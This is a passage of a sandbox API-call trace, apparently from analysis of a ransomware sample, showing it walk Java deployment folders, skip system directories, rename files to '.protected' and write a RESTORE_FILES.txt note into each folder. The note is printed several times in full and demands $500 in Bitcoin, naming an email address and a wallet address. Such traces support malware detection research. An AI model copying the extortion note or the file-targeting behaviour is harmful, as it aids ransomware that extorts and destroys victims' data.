halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties.protected")) returned 1 [0089.348] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.348] lstrcmpiW (lpString1="security", lpString2="Windows") returned -1 [0089.348] lstrcmpiW (lpString1="security", lpString2="Program Files") returned 1 [0089.348] lstrcmpiW (lpString1="security", lpString2="Program Files (x86)") returned 1 [0089.348] lstrcmpiW (lpString1="security", lpString2="$Recycle.bin") returned 1 [0089.348] lstrcmpiW (lpString1="security", lpString2="System Volume Information") returned -1 [0089.348] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security") returned 79 [0089.348] lstrcmpW (lpString1="security", lpString2=".") returned 1 [0089.348] lstrcmpW (lpString1="security", lpString2="..") returned 1 [0089.348] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\*") returned 81 [0089.348] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.348] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.348] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.348] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.348] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.348] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.349] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\.") returned 81 [0089.349] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.349] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.349] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.349] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.349] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.349] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.349] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.349] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\..") returned 82 [0089.349] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.349] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.349] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.349] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.349] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\RESTORE_FILES.txt") returned 97 [0089.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\security\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.350] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.350] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.351] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.351] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.351] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.351] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.351] CloseHandle (hObject=0x150) returned 1 [0089.351] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.351] lstrcmpiW (lpString1="tmp", lpString2="Windows") returned -1 [0089.351] lstrcmpiW (lpString1="tmp", lpString2="Program Files") returned 1 [0089.351] lstrcmpiW (lpString1="tmp", lpString2="Program Files (x86)") returned 1 [0089.351] lstrcmpiW (lpString1="tmp", lpString2="$Recycle.bin") returned 1 [0089.351] lstrcmpiW (lpString1="tmp", lpString2="System Volume Information") returned 1 [0089.351] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp") returned 74 [0089.351] lstrcmpW (lpString1="tmp", lpString2=".") returned 1 [0089.351] lstrcmpW (lpString1="tmp", lpString2="..") returned 1 [0089.351] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\*") returned 76 [0089.351] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.351] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.351] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.352] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.352] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.352] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.352] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\.") returned 76 [0089.352] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.352] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.352] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.352] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.352] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.352] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.352] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.352] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\..") returned 77 [0089.352] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.352] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.352] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.352] lstrcmpiW (lpString1="si", lpString2="Windows") returned -1 [0089.352] lstrcmpiW (lpString1="si", lpString2="Program Files") returned 1 [0089.352] lstrcmpiW (lpString1="si", lpString2="Program Files (x86)") returned 1 [0089.352] lstrcmpiW (lpString1="si", lpString2="$Recycle.bin") returned 1 [0089.352] lstrcmpiW (lpString1="si", lpString2="System Volume Information") returned -1 [0089.352] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si") returned 77 [0089.352] lstrcmpW (lpString1="si", lpString2=".") returned 1 [0089.352] lstrcmpW (lpString1="si", lpString2="..") returned 1 [0089.352] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\*") returned 79 [0089.352] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0089.352] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.352] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.353] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.353] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.353] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.353] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\.") returned 79 [0089.353] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.353] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0089.353] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.353] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.353] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.353] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.353] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.353] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\..") returned 80 [0089.353] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.353] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.353] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0089.353] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0089.353] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\RESTORE_FILES.txt") returned 95 [0089.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\tmp\\si\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.354] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.354] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0089.354] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.354] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.354] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.354] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0089.354] CloseHandle (hObject=0x154) returned 1 [0089.354] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.354] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.355] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\RESTORE_FILES.txt") returned 92 [0089.355] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\tmp\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.355] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.355] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.356] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.356] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.356] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.356] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.356] CloseHandle (hObject=0x150) returned 1 [0089.356] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.356] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.356] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\RESTORE_FILES.txt") returned 88 [0089.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.363] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.363] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.363] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.363] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.363] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.363] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.363] CloseHandle (hObject=0x14c) returned 1 [0089.364] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.364] lstrcmpiW (lpString1="jre1.7.0_45", lpString2="Windows") returned -1 [0089.364] lstrcmpiW (lpString1="jre1.7.0_45", lpString2="Program Files") returned -1 [0089.364] lstrcmpiW (lpString1="jre1.7.0_45", lpString2="Program Files (x86)") returned -1 [0089.364] lstrcmpiW (lpString1="jre1.7.0_45", lpString2="$Recycle.bin") returned 1 [0089.364] lstrcmpiW (lpString1="jre1.7.0_45", lpString2="System Volume Information") returned -1 [0089.364] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45") returned 71 [0089.364] lstrcmpW (lpString1="jre1.7.0_45", lpString2=".") returned 1 [0089.364] lstrcmpW (lpString1="jre1.7.0_45", lpString2="..") returned 1 [0089.365] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 